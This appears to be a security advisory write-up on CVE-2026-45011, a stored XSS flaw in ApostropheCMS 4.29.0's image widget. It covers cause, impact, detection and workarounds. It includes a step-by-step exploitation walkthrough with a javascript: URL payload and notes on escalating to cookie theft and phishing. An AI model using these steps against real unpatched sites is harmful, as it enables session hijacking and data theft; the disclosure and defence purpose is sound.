CVE-2026-45011: 
JavaScript Analyse et atténuation des vulnérabilités

CVE-2026-45011 is a stored cross-site scripting (XSS) vulnerability in ApostropheCMS's image widget functionality that allows users with the Editor role to inject malicious javascript: URL payloads into published page content. The vulnerability was published on May 13, 2026, and affects ApostropheCMS version 4.29.0 (npm package apostrophe). As of the advisory, no patched version has been released. It carries a CVSS v3.1 base score of 7.3 (High) (GitHub Advisory).

The root cause is improper neutralization of user-supplied input (CWE-79) combined with improper encoding or escaping of output (CWE-116) in the image widget's link field. When an Editor sets the "Link to" field of an image widget to a javascript: URL scheme, the application fails to validate or reject the dangerous protocol before storing and rendering it. Because the URL is not sanitized server-side or safely encoded in templates, the payload is persisted in the CMS database and rendered as a clickable hyperlink on the live page. Exploitation requires only low privileges (Editor role) and user interaction (a victim clicking the image link) (GitHub Advisory, ApostropheCMS Advisory).

Successful exploitation enables an attacker with Editor-level access to execute arbitrary JavaScript in the browser of any user — including administrators and anonymous visitors — who clicks the malicious image link on the published page. This can result in session hijacking, theft of sensitive CMS credentials or data, unauthorized modification of page content or site configuration, and phishing attacks conducted within the trusted site's origin. The confidentiality and integrity impacts are rated High, though availability is unaffected (GitHub Advisory).

1. Obtain Editor credentials: Acquire or compromise an account with the Editor (or Contributor) role on the target ApostropheCMS instance.
2. Ensure an image exists: Log in as an Editor, open the media library, and upload a JPG or PNG image if none exists. Set a title (e.g., "Probe image") and publish it.
3. Add a malicious image widget: Navigate to the target page, enable edit mode, click "Add content," and select the Image widget. Choose the uploaded image from the picker.
4. Inject the payload: Open the image widget settings, locate the "Link to" field, change it to "URL," and enter the payload: javascript:alert(document.domain) (or a more harmful payload such as a cookie-stealing script).
5. Publish the page: Save the widget and publish the page, making the malicious link live on the site.
6. Trigger execution: When any user (administrator, editor, or public visitor) visits the page and clicks the linked image, the JavaScript payload executes in their browser context.
7. Escalate impact: Use the executed payload to steal session cookies, perform actions as the victim, exfiltrate CMS data, or redirect users to phishing pages (ApostropheCMS Advisory).

• Logs: CMS audit logs showing an Editor or Contributor modifying an image widget's link field to a value beginning with javascript:, data:, or other non-HTTP schemes.
• Database: Stored widget configuration records in the ApostropheCMS database containing javascript: in URL/link fields associated with image widgets.
• Network: Browser-side network requests to unexpected external domains (e.g., attacker-controlled servers) originating from CMS pages, potentially indicating cookie exfiltration or beacon calls triggered by the XSS payload.
• Browser/Application Logs: JavaScript errors or unexpected alert() dialogs reported by users on published pages containing image widgets.
• File System: No direct file system artifacts expected, as the payload is stored in the database rather than on disk (ApostropheCMS Advisory).

As of the advisory date, no patched version of the apostrophe npm package has been released; the affected version is 4.29.0 with "Patched versions: None" listed. Site administrators should immediately audit all image widget configurations for javascript: or data: URL schemes in link fields and remove any suspicious entries. As a workaround, restrict the Editor role to trusted users only, and implement a strict Content Security Policy (CSP) header (e.g., script-src 'self') to reduce the impact of any XSS execution. Monitor the ApostropheCMS releases page for a patched version and upgrade as soon as one is available (GitHub Advisory, ApostropheCMS Advisory).

The advisory was published by boutell (an ApostropheCMS maintainer) on May 13, 2026, and the vulnerability was reported by security researcher MuhammadUwais. No significant broader media coverage, vendor statements beyond the advisory, or notable social media commentary has been identified at this time (ApostropheCMS Advisory).